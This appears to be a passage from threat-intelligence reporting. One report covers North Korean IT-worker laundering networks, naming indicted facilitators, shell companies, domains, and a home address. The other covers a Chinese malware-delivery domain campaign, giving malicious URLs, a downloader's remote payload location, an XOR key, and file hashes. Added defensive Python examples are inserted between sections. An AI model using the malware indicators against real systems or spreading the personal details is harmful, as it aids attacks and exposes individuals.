From his role as a logistics manager to a shell company architect, Wang helped build a shadow economy inside the legitimate global tech labor force, an economy designed to fund weapons development, evade sanctions, and penetrate sensitive digital infrastructure with ease.

Laptop Farms and Stolen Identities: Christina Chapman

Laptop farms function as remote access deception hubs, allowing foreign operatives to convincingly impersonate U.S.-based employees. In this scheme, the perpetrators acquire and configure laptops sent by U.S. companies to individuals they believe are legitimate remote hires. These devices are logged into and maintained from U.S. soil, typically through physical setups in homes or small offices, so that all network traffic and telemetry appear domestic. The key to this illusion is identity theft. Recently, the DOJ indicted Christina Chapman, a facilitator in Arizona, who ran “Laptop Farms”. Once the hiring process was complete, victim companies would ship work laptops and grant access to sensitive systems, unaware that the real end users were North Korean nationals abroad. Chapman’s role was not only to receive and activate these laptops but to maintain them for continuous remote access, ensuring that DPRK operatives could stay invisible behind American identities.

Christina Chapman
12607 W Vista Paseo Dr, Litchfield Park, AZ 85340
DPRK Laptop Farm run by Chapman

Platform Penetration & Global Expansion

As enforcement tightened on global freelancing hubs such as Upwork, Fiverr, and Freelancer.com, North Korean IT operatives expanded their focus to less-regulated, regionally focused gig platforms, particularly in the Middle East and North Africa (MENA). While major global platforms like Upwork and Freelancer still see DPRK IT worker recruitment, intelligence gathered throughout 2024 and 2025 indicates a broader strategy to infiltrate various online platforms. These platforms became attractive to DPRK-aligned actors due to their comparatively lenient onboarding processes, minimal identity verification, and weak vetting practices, which allow the actors to bypass employment verification controls.  

This expansion coincided with observed DPRK tactics documented by Microsoft Threat Intelligence and Google Cloud’s Mandiant division, which reported the use of KVM switch setups, stolen identity kits, and remote desktop software to simulate domestic employment in a given jurisdiction—even when the worker operated from DPRK or China. Newer tactics include the use of synthetic voices for video interviews, AI-generated profile images, and automated deployment of identity documents that pass lightweight vetting procedures common to less-regulated platforms.

Payment pipelines also evolved. Payments are often facilitated through virtual currency, as well as services like TransferWise and Payoneer, implying a preference for systems with limited oversight. In 2025, DPRK operatives received payment through disbursement services into crypto wallets or offshore accounts, routing earnings through UAE-based infrastructure. The available research does not directly corroborate specific incidents such as a “Ureed-based hire posing as a Syrian frontend engineer working for a UAE fintech company” or mobile application code delivered via “Nabbesh” by a user claiming to be Palestinian with telemetry traced to Vladivostok, Russia; the use of telemetry to detect Russian-linked infrastructure associated with DPRK activity is, however, confirmed.

This redirection to under-monitored platforms reflects the regime’s operational flexibility. Instead of abandoning freelance infiltration altogether, Pyongyang expanded its reach into low-friction digital labor markets with lower regulatory visibility. This expansion not only preserved a steady stream of foreign currency for the regime, but it also increased DPRK’s reach into sectors and geographies beyond traditional U.S.-centric targets. It is not simply opportunistic—it is part of a deliberate, adaptive campaign of economic espionage masked as remote software development.

Shell Company Infrastructure

The DPRK IT labor operation was propped up by a web of shell companies that each played a distinct, carefully engineered role in laundering salaries, spoofing employment legitimacy, and obfuscating the true identities of North Korean operatives. At the core of this infrastructure was Kejia Wang, a New Jersey-based facilitator who established multiple legal entities across the U.S. to mask the flow of illicit wages. Hopana-Tech LLC served as a primary payroll conduit, accepting salary payments from victim companies under the guise of a legitimate staffing agency. Tony WKJ LLC was used to receive and deploy laptops to DPRK operatives, while also functioning as a salary masking layer. Independent Lab LLC provided the technical underpinnings, including blockchain API relays and crypto wallet infrastructure to route funds out of the U.S. financial system. Highland Park 215 Spa LLC, ostensibly operating under the cover of a massage parlor in New Jersey, likely acted as a cash-out point for laundering physical funds.

Wang also operated Northstar Leadership Inc., which produced fabricated resumes and managed identity paperwork, essential for onboarding DPRK operatives to hiring platforms. Through Capella Aviation LLC, Wang and co-registrant Liwen Huang routed wire transfers through Hong Kong and mainland China, creating a cross-border financial bridge. On the Russian front, Gayk Asatryan used Asatryan LLC and Fortuna LLC to legally host 80 DPRK workers, legitimizing their presence under 10-year employment contracts signed with North Korean trading firms.

These entities were not isolated; they were interconnected through shared addresses such as 65 Idlewild Road, overlapping registration details, and reused bank accounts and crypto wallets. Together, they formed a sophisticated scaffolding that gave the illusion of legitimate employment and enterprise, while operating as the foundation for one of the most complex sanctions-evasion schemes tied to DPRK’s Reconnaissance General Bureau.

65 Idlewild Road, Edison NJ address connecting Kejia Wang-run operations
HIGHLAND PARK 215 SPA 215 Raritan Avenue, Highland Park, NJ

DPRK Currency Transfers Via Banking

Kejia Wang, operating from New Jersey, functioned as the financial cornerstone of the DPRK’s U.S.-based laundering scheme. Through front companies like Hopana Tech LLC, Tony WKJ LLC, and Independent Lab LLC, he established business and money transfer accounts used to receive salary payments from U.S. companies unwittingly employing North Korean IT workers under false identities.

At Hopana Tech, Wang opened a U.S. bank account that took in over $464,000 from victim firms between January 2022 and April 2024. These funds were rerouted to overseas co-conspirators such as Jing Bin Huang and a network of Chinese shell entities (e.g., Shenyang Xiwang, Deep Tech, Aolien) via Bank of China and Standard Chartered (HK).

Simultaneously, Tony WKJ LLC received more than $1.6 million through a U.S. money transfer service (MTS-2), which Wang distributed to accounts linked to Enchia Liu, Food Yard Trading (Dubai), and Shenyang Sun-Lotus Tech. He personally siphoned $218,000 into his own U.S. checking account and another $412,000 to his personal MTS account. Between 2022 and 2023, he also received $237,000 in salary deposits into that same personal account, then forwarded $208,000 across 43 transfers to co-conspirators Huang and Tong Yuze.

Wang further disguised laptop handling and device access fees as routine payments labeled “CA laptops” and “NY laptops,” totaling over $55,000 sent to two U.S.-based facilitators.

Lastly, using MTS-3, Wang falsely registered Tony WKJ as a “VC-backed software firm” and received $352,949 from victim companies. When flagged by MTS staff, Wang lied about a DPRK worker under the alias “Wandee C.,” claiming he was a subcontracted developer.

In total, these financial maneuvers moved millions through U.S. infrastructure to overseas nodes, enabling DPRK operatives to mask their identities and launder salaries under the guise of legitimate tech consulting.

Crypto Payment Flows & Wallet Infrastructure

The laundering of salaries earned by North Korean IT operatives followed a structured, multi-phase pipeline designed to minimize traceability and regulatory exposure. In Phase 1: Salary Receipt, payments from unsuspecting U.S. and international companies were sent either to front companies, such as Hopana-Tech LLC and Independent Lab LLC, or directly to wallet addresses listed on the operatives’ GitHub profiles. These companies believed they were paying legitimate U.S.-based contractors, unaware that the workers were remote operatives in North Korea using stolen or forged identities.

Phase 2: Obfuscation began as soon as payments arrived. Smart contracts were employed to automatically split the incoming funds across clusters of Ethereum or TRON wallets. This fragmentation technique, similar to those used in ransomware operations, obscured the origin of the funds and made tracking the complete financial trail more difficult. Each tranche was redirected through different wallets, reducing the ability of investigators to correlate input/output flows with a single identity or origin point.

In Phase 3: Conversion, the obfuscated crypto was aggregated and funneled through over-the-counter (OTC) brokers based in Russia, the United Arab Emirates, and Hong Kong. These brokers specialize in converting large sums of stablecoins into fiat or alternative cryptocurrencies while avoiding compliance triggers. Eventually, the cleaned funds were consolidated into wallets under DPRK control, some of which have since been blocklisted by platforms like Tether for links to illicit activity and sanctions violations. This seamless pipeline allowed the DPRK to convert stolen or fraudulently earned wages into usable capital for the regime’s strategic programs, including its weapons development efforts.

DPRK IT Worker Cluster Wallet & Identity Mapping

Eight fake identities represent a sophisticated and evolving strategy by the DPRK’s IT worker apparatus to not only infiltrate U.S.-based companies but to systematically exfiltrate salary payments into laundering pipelines that support North Korea’s sanctioned economy. Each alias, crafted with care and strategic foresight, was tied to a complex infrastructure of forged documents, crypto wallets, and online developer personas, all designed to evade detection by employers, banks, and regulators.

These aliases were not random. Many were modeled on plausible names common in the U.S., Canada, or Southeast Asia, making them more likely to pass identity verification or “soft KYC” checks on freelancing platforms and internal HR systems. They were often accompanied by polished LinkedIn profiles, active GitHub repositories, and consistent communication habits, all of which contributed to the illusion of a legitimate remote developer.

Behind the scenes, each identity was directly linked to salary laundering flows. For instance, Andy Bell, Benjamin Nguyen, and Sandy Nguyen used ETH-based wallet addresses, including vanity ENS domains like bbshark[.]eth and gsofter[.]eth, to receive payments from U.S. firms under the guise of contract work. These addresses were often listed on their GitHub accounts as “payment preferred to…” links, allowing unsuspecting employers or payroll processors to initiate transfers.

In many cases, funds were first routed to these GitHub-linked wallets, then automatically or manually split using smart contracts across secondary addresses. From there, the payments were funneled to consolidation wallets controlled by DPRK facilitators or OTC brokers in Russia, China, or the UAE. For example, funds from wallets tied to Josh Thomas and Muhammad Abdullah were traced via ZachXBT and TRM Labs to known laundering hubs tied to sanctioned North Korean operators. (*ZachXBT is a self-taught, pseudonymous blockchain investigator who has gained global recognition for tracking fraudulent crypto transactions, hacks, rug pulls, and state-linked laundering schemes.)

The fake geographic locations assigned to these aliases were deliberately chosen to align with employment demand and reduce suspicion, such as Texas, California, Toronto, and Michigan, regions known for tech industry presence. These locations also matched VPN exit nodes and remote access IP ranges used to simulate U.S.-based developer activity during work hours.

In total, these eight identities were tied to at least 12 different U.S. and international projects. They helped siphon hundreds of thousands in salaries, while embedding DPRK-linked code contributors into the core of web3 startups, fintech platforms, and even infrastructure projects. Their exposure now offers critical insight into the DPRK’s strategy: weaponizing remote work, exploiting global labor gaps, and turning open-source ecosystems into vectors of economic subversion.

ZachXBT on X
Wallet tweet
Further wallet details

Associated Consolidation Wallets

ZachXBT reports that all of the above identities and payment addresses lead to two known consolidation wallets:

These wallets serve as hubs in laundering pathways, taking in payments from U.S. firms and redistributing to DPRK-controlled endpoints via OTC brokers and blacklisted channels. These are frequently referenced in TRM Labs and Treasury forfeiture filings.

Global Network of Enablers

The DPRK’s IT worker laundering network was supported by a multinational cast of facilitators operating across five regions, each providing critical functions that enabled the scheme to scale globally. In the United States, Kejia Wang and Zhenxing “Danny” Wang served as the domestic linchpins, establishing shell companies like Hopana-Tech LLC and Independent Lab LLC, receiving company-issued laptops, and enabling remote access for DPRK operatives via KVM switches. In China, actors such as Jing Bin Huang, Tong Yuze, and Zhenbang Zhou were responsible for setting up domain infrastructure, fabricating identity records, and acting as intermediaries in the salary flow chain. Operating from the United Arab Emirates, Yongzhe Xu and Ziyou Yuan handled the setup of financial accounts and cryptocurrency wallets that served as routing points for laundered funds. Meanwhile, in Taiwan, Mengting Liu and Enchia Liu were tasked with salary account management and crypto-to-cash withdrawal, helping to finalize the money laundering cycle. In Russia, Gayk Asatryan took on a more formal role, entering into 10-year labor agreements with DPRK trading entities and providing legal cover through his companies Asatryan LLC and Fortuna LLC for the long-term hosting of North Korean IT workers. Together, these individuals formed the logistical and financial scaffolding behind one of the DPRK’s most successful sanctions evasion operations to date.

Listed on sites and indicted by DOJ

Domains Used to Mask DPRK Labor Pipelines

While the physical infrastructure of DPRK’s cyber-labor operation is anchored in shell companies and banking channels, its digital front is built on a deceptively simple architecture: domain registrations and simple, one-layer-deep websites. Four key domains, hopanatech[.]com, tonywangtech[.]com, wkjllc[.]com, and inditechlab[.]com, emerged as critical components of the laundering and deception ecosystem.

All four were registered through NameCheap, a domain registrar frequently exploited by threat actors for its lenient Know-Your-Customer (KYC) policies. These domains aligned closely with the shell companies documented in the July 2025 indictment of Kejia Wang (aka Tony Wang).

  • hopanatech[.]com: Used as a façade for the employer-of-record shell “Hopana Tech LLC.” This site served as a point of contact and “employment verification” front, meant to convince firms that IT workers were U.S.-based.
  • tonywangtech[.]com and wkjllc[.]com: Variations on the Tony WKJ LLC shell, these domains were used to generate email aliases and submit resumes under false identities. They helped DPRK contractors pass due diligence by appearing affiliated with a legitimate tech firm.
  • inditechlab[.]com: Tied to Independent Lab LLC, a shell involved in crypto infrastructure. The domain may have also hosted webhooks and API interfaces used in TRON-based laundering flows.

Despite their differing branding, these domains shared clear indicators of clustering:

  • Similar registrar info and name servers
  • Absence of advanced metadata like Google Analytics or embedded tracking (indicating high OPSEC awareness)
  • WHOIS privacy enabled
  • Associated email accounts and DNS infrastructure linked to Wang or his co-conspirators

These domains were not just placeholders. They were operationally active, used in job applications, HR communications, resume verification, and even crypto billing. In short, they functioned as front-facing digital camouflage for a covert state-aligned economic espionage program.

DomainTools searches of four domains created by Tony and Zhenxing Wang for LLCs
Domains created by Kejia Wang for shell LLCs
wkjllc[.]com on The Wayback Machine
inditechlab[.]com on The Wayback Machine
tonywangtech[.]com on The Wayback Machine
hopanatech[.]com on The Wayback Machine

Strategic and Financial Impact

By the first half of 2025, North Korea’s covert IT labor scheme had evolved into a robust revenue-generating apparatus capable of siphoning millions from the global economy with alarming precision. An estimated $17 million in salary payments was funneled through shell companies and direct crypto wallets tied to DPRK operatives posing as freelance developers. It is also cited that the total for the scheme globally netted between $250 to $600 million altogether. These payments came from hundreds of U.S. companies, including fintech startups, SaaS vendors, blockchain firms, and even defense contractors, who unknowingly onboarded North Korean nationals through falsified resumes and forged identity documents. In June 2025, U.S. authorities seized $7.7 million in cryptocurrency assets connected to the scheme, targeting wallets tied to aliases like “devmad119” and “Joshua Palmer.” Yet this represents just a fraction of the broader threat: over $1.6 billion in global cryptocurrency losses were attributed to DPRK-linked actors in the same time period, with 70% directly traced to operations blending employment fraud, social engineering, and codebase compromise. Far beyond financial theft, this scheme granted North Korean operatives persistent system access, enabling the injection of malicious logic, exfiltration of proprietary code, and creation of long-term backdoors across critical sectors.

Insider Threats: Espionage by Employment

North Korean IT operatives, posing as legitimate remote developers, evolved from mere economic infiltrators to full-fledged insider threats. Once embedded within U.S. and foreign tech firms, these operatives obtained privileged access to critical assets, including GitHub repositories, CI/CD pipelines (like Jenkins and GitLab), and cloud configuration files across AWS, Azure, and GCP. With this level of access, they would be able to insert stealthy “sleeper” functions, delayed or dormant code designed to activate later, as well as data exfiltration logic disguised within standard requests, such as base64-encoded POST or GET calls.

To date, no official disclosures from the government or private sector have confirmed that such actions have occurred. However, given that these nation-state adversaries were embedded as insider threats, it is reasonable to assess that once they gained access to sensitive networks and digital assets, they likely exploited opportunities that extended beyond financial fraud. The potential for strategic espionage, leveraging their privileged access for intelligence collection or cyber sabotage, must be considered a probable scenario.

Threat Assessment

The infiltration of DPRK IT workers into Western firms represents one of the most sophisticated and insidious insider threat campaigns in recent memory. Unlike external cyberattacks that can be blocked at the perimeter, these operatives gained trusted persistent access inside corporate networks by posing as vetted remote employees. Once hired, often via stolen, background-verified U.S. identities, they were embedded into critical roles such as backend development, cloud configuration, CI/CD pipeline maintenance, and DevOps infrastructure. This level of access granted them entry into source code repositories, production environments, encryption logic, and proprietary APIs, allowing for potential IP theft, backdoor insertion, credential harvesting, and pre-positioning for future attacks.

This threat was magnified by a widespread failure among companies to implement robust asset management, access logging, and behavioral anomaly detection. In many cases, organizations lacked visibility into who exactly was accessing which systems, when, and from where. The use of remote KVM switches, proxy VPNs, and U.S.-based cloud endpoints enabled DPRK operatives to blend in with legitimate employee traffic, bypassing geo-fencing or basic endpoint monitoring. Some firms failed to enforce multi-factor authentication, revoke GitHub deploy keys upon contractor termination, or monitor suspicious API activity from “internal” users. Additionally, lax onboarding processes and over-reliance on third-party background check platforms meant many identities went unverified or unchecked.

To counter these threats, companies must enforce zero-trust security models, where access is continuously evaluated based on device health, location, and behavioral norms. Automated asset inventories, real-time session monitoring, and privileged access management (PAM) should be standard practice. Every contractor should have narrowly scoped, time-limited access tied to individual credentials, with full audit trails and immediate revocation mechanisms. Organizations must also reevaluate how they vet remote talent, introducing biometric verification, live interviews, and cross-checks with employment databases to prevent identity fraud. Failure to do so risks granting hostile nation-state actors like the DPRK the keys to their most valuable digital assets, without ever breaching a firewall.
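As an added illustration of the controls this section calls for (example code, not the report's own or any named firm's tooling), the following Python audit runs over constructed contractor records and login events: it flags credentials that outlive an engagement or never expire, logins whose source region contradicts the region on file, one domestic address shared by several contractor accounts (the laptop-farm pattern), and region changes too fast to be travel. Every handle, IP, region and timestamp in it is invented.

```python
"""Added contractor-access audit (not from the original report). All records are constructed."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, datetime, timedelta
from typing import Optional


@dataclass(frozen=True)
class Engagement:
    user: str
    declared_region: str          # region the contractor claims on profile/paperwork
    end_date: Optional[date]      # None while the engagement is still open


@dataclass(frozen=True)
class Grant:
    user: str
    kind: str                     # e.g. "github_deploy_key", "ci_token", "cloud_role"
    scope: str
    expires: Optional[date]       # None means the credential never expires


@dataclass(frozen=True)
class Login:
    user: str
    when: datetime
    src_ip: str
    ip_region: str                # region resolved from src_ip (constructed enrichment)


def stale_grants(engagements, grants, today):
    """Credentials still active after the engagement ended, or issued with no expiry."""
    ended = {e.user: e.end_date for e in engagements
             if e.end_date is not None and e.end_date < today}
    findings = []
    for g in grants:
        if g.user in ended:
            findings.append((g.user, g.kind, g.scope, f"engagement ended {ended[g.user]}"))
        elif g.expires is None:
            findings.append((g.user, g.kind, g.scope, "no expiry set"))
    return findings


def region_mismatches(engagements, logins):
    """Logins whose resolved region differs from the region the contractor declared."""
    declared = {e.user: e.declared_region for e in engagements}
    return [(l.user, l.src_ip, l.ip_region, declared[l.user])
            for l in logins if l.user in declared and l.ip_region != declared[l.user]]


def shared_endpoints(logins, min_users=3):
    """Source IPs used by several distinct contractor accounts: the laptop-farm pattern,
    where one domestic address fronts for many 'remote hires'."""
    users_by_ip = defaultdict(set)
    for l in logins:
        users_by_ip[l.src_ip].add(l.user)
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) >= min_users}


def impossible_travel(logins, window=timedelta(hours=2)):
    """One account seen in two regions within `window`: a VPN or KVM hand-off indicator."""
    by_user = defaultdict(list)
    for l in logins:
        by_user[l.user].append(l)
    hits = []
    for user, events in by_user.items():
        events.sort(key=lambda l: l.when)
        for a, b in zip(events, events[1:]):
            if a.ip_region != b.ip_region and b.when - a.when <= window:
                hits.append((user, a.ip_region, b.ip_region, b.when - a.when))
    return hits


# Constructed sample data: handles modelled on the report's aliases, documentation-range IPs.
TODAY = date(2025, 7, 15)
ENGAGEMENTS = [
    Engagement("jpalmer", "US-TX", date(2025, 5, 31)),   # contract ended six weeks ago
    Engagement("snguyen", "US-CA", None),
    Engagement("abell", "CA-ON", None),
    Engagement("jthomas", "US-MI", None),
]
GRANTS = [
    Grant("jpalmer", "github_deploy_key", "org/payments-api", None),   # never revoked
    Grant("snguyen", "ci_token", "pipeline:release", date(2025, 9, 30)),
    Grant("abell", "cloud_role", "prod-readonly", None),               # no expiry
]
T0 = datetime(2025, 7, 14, 14, 0)
LOGINS = [
    Login("jpalmer", T0, "203.0.113.7", "US-NJ"),
    Login("snguyen", T0 + timedelta(minutes=5), "203.0.113.7", "US-NJ"),
    Login("abell", T0 + timedelta(minutes=9), "203.0.113.7", "US-NJ"),
    Login("jthomas", T0, "198.51.100.20", "US-MI"),
    Login("jthomas", T0 + timedelta(minutes=40), "192.0.2.55", "RU-PRI"),
]

if __name__ == "__main__":
    print("stale grants:", stale_grants(ENGAGEMENTS, GRANTS, TODAY))
    print("region mismatches:", region_mismatches(ENGAGEMENTS, LOGINS))
    print("shared endpoints:", shared_endpoints(LOGINS))
    print("impossible travel:", impossible_travel(LOGINS))
```

In production the same four checks would be fed from the HR system of record, the identity provider's sign-in log, and the credential inventories of GitHub, CI and the cloud accounts, which is exactly the visibility the section says many firms lacked.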

Conclusion

The breaking up of the DPRK IT workers exploit is a wake-up call for corporations around the world. The aphorism of “The insider threat is the biggest threat” in the infosec space rings true here with a clarion call. So far, the information that has come out (and continues to be researched) seems to indicate that the U.S. was not the only target of the DPRK activities. That said, it is important that corporations and organizations understand the aphorism above, and do all they can to ensure such insider attacks are much harder to carry out.

It is also important that, within the new paradigm of AI, interviews, vetting, and generally, everything carried out during the interview and vetting process, be backstopped to ensure authentic individuals are being hired, and not assets of a foreign power, or for that matter, other criminal actors. This new landscape will only get more complex, and as we move forward into this brave new world, expect there to be other exploits like these that could render your operations into extreme response circumstances.

Chinese Malware Delivery Domains: Part III

This report details an ongoing campaign by an actor operating primarily during Chinese time zone working hours, targeting Chinese-speaking individuals and entities within and outside China. Since approximately June 2023, the actor has created more than 2,800 domains for malware delivery. The actor's methods and malware, largely unchanged since June 2023, primarily deliver Windows-specific malware through fake application download sites and fake update prompts in various spoofed login pages, marketing apps, business sales apps, and cryptocurrency related apps.

Following previous reports, the actor made notable operational changes including the addition of 

  • Anti-automation and browser emulation code
  • Reduction in site tracker services
  • Increased server distribution for sparser domain resolutions per IP address
  • More discreet registration details

As of June 2025, 266 of the over 850 identified domains since December 2024 were actively distributing malware.

For comprehensive details, refer to the two prior reports linked below:

Part 1: https://dti.domaintools.com/chinese-malware-delivery-websites/ 

Part 2: https://dti.domaintools.com/chinese-malware-delivery-domains-part-ii-data-collection/ 

A Sampling of Their Malware Delivery Websites

Fake Gmail Login

The `googeyxvot[.]top` domain uses anti-automation and browser emulation checks, and any input on its fake login page triggers a deceptive browser incompatibility error, prompting a malicious update download. Multiple JavaScript files are employed to obfuscate the download URL.

A malicious .zip file from `googeyxvot[.]top` delivers an .msi installer. This installer contains multiple .jpg named files and two executables, `svchost.13.exe` and `flashcenter_pl_xr_rb_165892.19.exe`. `svchost.13.exe` acts as a downloader, fetching a file from `https://ffsup-s42.oduuu[.]com/uploads%2F4398%2F2025%2F06%2F617.txt`. The downloaded file uses a shellcode decoder loop, decrypts its content with XOR key "0x25", and executes an embedded PE file.

  • Download URL: googeyxvot[.]top/assets/download/buile/flashcenter_pl_xr_rb_165892.19.zip
  • flashcenter_pl_xr_rb_165892.19.zip, SHA256 7705ac81e004546b7dacf47531b830e31d3113e217adeef1f8dd6ea6f4b8e59b
  • flashcenter_pl_xr_rb_165892.19.msi, SHA256 a48043b50cded60a1f2fa6b389e1983ce70d964d0669d47d86035aa045f4f556

The .msi file contains several .jpg-named files and two executables:

  • svchost.13.exe, SHA256 f1b6d793331ebd0d64978168118a4443c6f0ada673e954df02053362ee47917b
  • flashcenter_pl_xr_rb_165892.19.exe, SHA256 1c957470b21bf90073c593b020140c8c798ad8bdb2ce5f5d344e9e9c53242556

svchost.13.exe acts as a downloader, retrieving a file from https[:]//ffsup-s42.oduuu[.]com/uploads%2F4398%2F2025%2F06%2F617.txt

  • uploads%2F4398%2F2025%2F06%2F617.txt, SHA256 e9ba441b81f2399e1db4b86e1fe301aaf2f11d3cf085735a55505873c71cbc6f

The downloaded file contains a shellcode decoder loop, decrypts the rest of the file with XOR key “0x25”, and executes an embedded PE file.

  • Embedded PE file, SHA256 28e6c4d71b700ac93c8278ef7968e3d8f9454eff2e8df5baf2fff6acbfdf6c39
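When triaging a payload like the 617.txt file above, an analyst wants to confirm the single-byte XOR key and locate the embedded PE without trusting the key seen in an earlier sample. The Python helper below is an added example (not the report's code): it tries every key, validates the MZ header and its e_lfanew pointer to the PE signature, and carves the image. The blob it runs on is built inside the script from a filler prefix and a minimal PE-shaped header, not the real sample.

```python
"""Added triage helper (not from the report): locate a single-byte-XOR-encoded PE inside a
downloaded blob, as described for the 617.txt payload. The sample blob is constructed."""
import struct


def find_xored_pe(blob, keys=range(256)):
    """Return (key, offset) of the first embedded PE that decodes under a single-byte XOR.

    A hit requires 'MZ' at `offset` and the DOS header's e_lfanew field (offset 0x3c)
    pointing at a 'PE\\0\\0' signature inside the blob. Every key is tried so a key
    reported for an earlier sample (0x25 here) is verified rather than assumed."""
    for key in keys:
        decoded = bytes(b ^ key for b in blob)
        start = 0
        while (pos := decoded.find(b"MZ", start)) != -1:
            if pos + 0x40 <= len(decoded):
                e_lfanew = struct.unpack_from("<I", decoded, pos + 0x3c)[0]
                sig = pos + e_lfanew
                # Sanity-bound e_lfanew: real NT headers sit within the first few KB.
                if 0x40 <= e_lfanew < 0x1000 and decoded[sig:sig + 4] == b"PE\0\0":
                    return key, pos
            start = pos + 1
    return None


def carve_pe(blob, key, offset):
    """Decode from `offset` to the end of the blob; the PE image starts at byte 0 of the result."""
    return bytes(b ^ key for b in blob[offset:])


def build_sample(key=0x25):
    """Constructed stand-in for the payload: a filler prefix (NOT real decoder code) followed
    by a minimal PE-shaped header, all XOR-encoded with `key`. Returns (blob, pe_offset)."""
    e_lfanew = 0x80
    dos_header = b"MZ" + b"\x90" * (0x3c - 2) + struct.pack("<I", e_lfanew)
    pe_image = dos_header + b"\0" * (e_lfanew - len(dos_header)) + b"PE\0\0" + b"\0" * 20
    prefix = bytes(range(0x10, 0x60))          # strictly increasing bytes, so no 'MZ' pair
    plain = prefix + pe_image
    return bytes(b ^ key for b in plain), len(prefix)


SAMPLE_BLOB, SAMPLE_PE_OFFSET = build_sample()

if __name__ == "__main__":
    hit = find_xored_pe(SAMPLE_BLOB)
    if hit is None:
        print("no single-byte-XOR-encoded PE found")
    else:
        key, offset = hit
        print(f"key=0x{key:02x} pe_offset={offset} header={carve_pe(SAMPLE_BLOB, key, offset)[:2]!r}")
```

On a real file, read it with `open(path, "rb").read()` in place of `SAMPLE_BLOB` and write the carved bytes out for hashing and further static analysis.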

Fake Alipay Checkout

The domain displays a fake popup stating it cannot operate currently due to the use of abnormal operation mode. The buttons Get Help Now and Cancel are displayed, which prompt a download of a malicious file. 

yeepays[.]xyz

An imported JavaScript file defines the download path:

“yeepays[.]xyz/assets/js/external_load.js”

The filename is defined in another imported JavaScript file:

“yeepays[.]xyz/assets/download/filename.js”

The download URL for the malicious file then becomes:

“https[:]//yeepays[.]xyz/assets/download/收银台权限.exe”, SHA256 21a0b62adc71b276a5bc8a3170ab6e315ac2c0afe8795cfeade8461f00a804d2

Fake Cryptocurrency Sites

coinbaw[.]vip

Clicking most of the interactive buttons redirects to a fake sign-in page for a fake crypto exchange named “CoinBaw”, which likely attempts to spoof Coinbase.

Registration Details

Mapping over 2,800 of the actor’s registered domains since June 2024, we observed similar trends in timing.

Domain Registrations Create Date

Domain Resolutions First Seen

Comparing the registration creation times for domains with their respective first-seen resolution times from DNS lookups, we can approximate possible human working hours from commonalities in infrastructure acquisition and operationalization. Both events can be largely automated, so the timing of either one on its own is not fully reliable, but together they may offer some valuable insight, particularly with regard to potential prevalence in targeted regions.

We observed a common distribution of both domain acquisition and potential operationalization across times. Operationalization in this context is the step after registering the domains and associated infrastructure: making use of them in some operational way, in this case to deliver malware via spoofed application download pages. The majority of both are seen to occur during normal Chinese working hours. Notably, the volume of first-seen resolutions of those domains also peaks during normal Chinese working hours.
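The timing comparison described here, as an added Python example (not the report's own tooling): registration and first-seen-resolution timestamps are bucketed into China Standard Time hours, the share falling inside a working-day window is computed, and the same data is re-bucketed in a second time zone to show the contrast the inference rests on. The domain records are constructed, with placeholder names and invented timestamps.

```python
"""Added example (not from the report): bucket domain creation and first-seen-resolution
times into China Standard Time hours to approximate operator working hours."""
from datetime import datetime, timedelta, timezone
from statistics import median

CST = timezone(timedelta(hours=8))          # China Standard Time, UTC+8
UTC_MINUS_5 = timezone(timedelta(hours=-5))  # a US East Coast reference (standard time)
WORK_HOURS = range(9, 18)                    # 09:00-17:59 local: a simple working-day window

# Constructed records: placeholder domain names and invented UTC timestamps (ISO 8601).
RECORDS = [
    {"domain": "sample-a[.]top", "created": "2025-03-03T01:12:00Z", "first_seen": "2025-03-03T05:40:00Z"},
    {"domain": "sample-b[.]top", "created": "2025-03-03T02:30:00Z", "first_seen": "2025-03-04T03:00:00Z"},
    {"domain": "sample-c[.]top", "created": "2025-03-04T06:05:00Z", "first_seen": "2025-03-04T08:15:00Z"},
    {"domain": "sample-d[.]top", "created": "2025-03-05T16:45:00Z", "first_seen": "2025-03-06T01:30:00Z"},
    {"domain": "sample-e[.]top", "created": "2025-03-05T07:20:00Z", "first_seen": "2025-03-05T09:50:00Z"},
    {"domain": "sample-f[.]top", "created": "2025-03-06T12:00:00Z", "first_seen": "2025-03-06T13:10:00Z"},
]


def parse_utc(stamp):
    """Parse a 'YYYY-MM-DDTHH:MM:SSZ' string into a timezone-aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hour_histogram(records, field, tz=CST):
    """Count events in `field` per local hour (0-23) after converting the UTC stamps into tz."""
    counts = [0] * 24
    for rec in records:
        counts[parse_utc(rec[field]).astimezone(tz).hour] += 1
    return counts


def working_hours_share(records, field, tz=CST, work=WORK_HOURS):
    """Fraction of events in `field` that fall inside the working-day window in tz."""
    hist = hour_histogram(records, field, tz)
    total = sum(hist)
    return sum(hist[h] for h in work) / total if total else 0.0


def median_lag_hours(records):
    """Median time from registration to first observed resolution, in hours."""
    lags = [(parse_utc(r["first_seen"]) - parse_utc(r["created"])).total_seconds() / 3600
            for r in records]
    return median(lags)


def summarize(records, tz=CST, label="CST"):
    """The lines an analyst would put under the two histogram figures in the report."""
    return [
        f"{label} working-hours share, registration: {working_hours_share(records, 'created', tz):.0%}",
        f"{label} working-hours share, first resolution: {working_hours_share(records, 'first_seen', tz):.0%}",
        f"median registration-to-resolution lag: {median_lag_hours(records):.1f} h",
    ]


if __name__ == "__main__":
    # Viewed from UTC-5 the same events cluster at night, which is the contrast that
    # makes the CST working-hours clustering informative rather than coincidental.
    for line in summarize(RECORDS) + summarize(RECORDS, UTC_MINUS_5, "UTC-5"):
        print(line)
```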

Changes In Operations

The actor has implemented several changes in their operational tactics. This includes the addition of rudimentary anti-automation and browser emulation code, designed to hinder site scanners from effectively retrieving website content. Furthermore, there has been a reduction in the use of site tracker services such as Baidu, Gtag, and Facebook. The actor has also increased the number of servers used to spread domain resolution more widely, and adopted more discreet registration details to obscure uniquely identifiable information.

Conclusion

The "SilverFox" actor continues to demonstrate a high degree of persistence and scale in their malware delivery operations, primarily targeting Chinese-speaking individuals and entities globally with Windows-specific malware. Their campaign, ongoing since at least June 2023, leverages over 2,800 created domains, with 266 remaining active since December 2024, highlighting their sustained infrastructure and reliability improvements. The consistent operational timing across all hours, with high influxes during Chinese working hours, in addition to other factors suggests a combination of automated and likely human-driven approaches to their activities.

While the actor's ultimate motivations remain somewhat uncertain, their tactics strongly suggest financially motivated and opportunistic objectives. We suspect their primary goals include credential and financial theft, and potentially access brokering. Furthermore, the observed targeting of individuals engaged in sales and marketing, particularly those outside China but involved in business prospects within the region and possessing Chinese language skills, points to a potential secondary motivation to exploit specific professional networks for further gains.

